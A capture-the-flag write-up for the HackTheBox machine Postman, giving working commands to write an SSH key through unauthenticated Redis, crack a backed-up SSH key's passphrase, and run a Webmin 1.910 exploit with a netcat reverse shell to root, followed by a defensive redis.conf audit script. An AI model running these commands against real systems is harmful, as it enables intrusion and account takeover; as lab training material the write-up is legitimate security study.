# HackTheBox Postman

## 1. Nmap

![](https://i.imgur.com/vVWnRyS.png)

* Port 22: OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
* Port 80: Apache httpd 2.4.29 ((Ubuntu))
* Port 6379: Redis key-value store 4.0.9
* Port 10000: MiniServ 1.910 (Webmin httpd)
  * Google MiniServ 1.910
    * ![](https://i.imgur.com/WthI7oo.png)
    * CVE-2019-12840
    * Needs a username and password!

## 2. Web Server

* Language: HTML
* View: ![](https://i.imgur.com/nA1YL2Z.jpg)
* Gobuster
  * Payload: `gobuster dir -u "http://postman/" -w /usr/share/seclist/Discovery/Web-Content/raft-small-words.txt -x html`
  * Interesting dir
    * /upload/
      * Nothing interesting here

## 3. Exploit Redis

* Check auth
  * `redis-cli -h 10.10.10.160`
  * No authentication required
* Use SSH to log in as redis
  * Check user
    * `redis-cli -h 10.10.10.160`
    * `config get dir`
    * ![](https://i.imgur.com/xKVC24M.png)
  * Attacker machine:
    * `ssh-keygen -t rsa`
    * `(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > spaced_key.txt`
    * `cat spaced_key.txt | redis-cli -h 10.10.10.160 -x set ssh_key`
  * Redis (`redis-cli -h 10.10.10.160`):
    * `config set dir /var/lib/redis/.ssh`
    * `config set dbfilename "authorized_keys"`
    * `save`
  * Attacker machine:
    * `ssh redis@10.10.10.160 -i ~/.ssh/id_rsa`

## 4. Privilege Escalation To Matt

* Interesting file:
  * /opt/id_rsa.bak
* Log in as Matt with SSH
  * Copy /opt/id_rsa.bak to the attacker machine
  * Try to log in as Matt with this SSH key file:
    * ![](https://i.imgur.com/KrgmLdU.png)
  * Crack the SSH passphrase:
    * `ssh2john id_rsa > id_rsa.hash`
    * `john --wordlist=/usr/share/rockyou.txt id_rsa.hash`
    * Got passphrase: computer2008
    * ![](https://i.imgur.com/v2cYXmO.png)
  * Log in as Matt with SSH id_rsa
    * ![](https://i.imgur.com/B4l0zI8.png)
    * Failed: the connection closes right after login.
* Log in as Matt with su
  * `su Matt`, password = computer2008
  * ![](https://i.imgur.com/vQTSnkM.png)
  * Successfully got user.txt

## 5. Exploit MiniServ 1.910

* Try to log in to MiniServ 1.910 as Matt
  * User: Matt
  * Password: computer2008
  * ![](https://i.imgur.com/1oZFnMR.png)
  * Login success
* Now we can exploit it with the following PoC
  * Target: https://postman:10000/
  * PoC script: [webmin_exploit.py](https://raw.githubusercontent.com/roughiz/Webmin-1.910-Exploit-Script/master/webmin_exploit.py)
  * Payload:
    * First use netcat to listen on port 9001: `nc -lvnp 9001`
    * Then run the PoC: `python webmin_exploit.py --rhost 10.10.10.160 --lhost your_ip --rport 10000 --lport 9001 -u Matt -p computer2008 -s True`
    * ![](https://i.imgur.com/BHFeaOI.png)
    * ![](https://i.imgur.com/BqO7H4k.png)
    * Got root!
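
The Redis step in section 3 only works because the server accepts remote clients without a password and leaves `CONFIG` available. The following audit of a `redis.conf` for exactly those settings is an added example, not part of the original write-up; the function names, finding ids and both sample configurations are constructed for illustration.

```python
import shlex

LOOPBACK = {"127.0.0.1", "::1", "localhost"}

def parse_conf(text):
    """Map each redis.conf directive to the list of its argument lists."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        name, *args = shlex.split(line)  # handles quoted values such as ""
        conf.setdefault(name.lower(), []).append(args)
    return conf

def audit(text):
    """Return sorted finding ids for the settings the Redis step depends on."""
    conf = parse_conf(text)
    def last(name):  # arguments of the last occurrence, or [] when absent
        return conf.get(name, [[]])[-1]
    findings = set()
    password = "".join(last("requirepass"))
    if not password:
        findings.add("no-requirepass")
    bind = last("bind")
    protected = "".join(last("protected-mode")).lower() or "yes"
    # Protected mode only helps when there is no explicit bind and no password.
    exposed = any(a not in LOOPBACK for a in bind) if bind else protected == "no"
    if exposed:
        findings.add("network-exposed")
    if exposed and not password:
        findings.add("unauthenticated-remote-access")
    # CONFIG SET dir/dbfilename is what redirects the dump file on SAVE.
    renamed = {args[0].upper() for args in conf.get("rename-command", []) if args}
    if "CONFIG" not in renamed:
        findings.add("config-command-enabled")
    return sorted(findings)

# Constructed sample configurations, not taken from the target machine.
WEAK_CONF = "bind 0.0.0.0\nprotected-mode yes\n"
HARDENED_CONF = """
bind 127.0.0.1 ::1
protected-mode yes
requirepass "constructed-long-random-secret"
rename-command CONFIG ""
"""

if __name__ == "__main__":
    print(audit(WEAK_CONF), audit(HARDENED_CONF))
```

An explicit `bind 0.0.0.0` is flagged even with `protected-mode yes`, because protected mode is only enforced when no bind address and no password are configured.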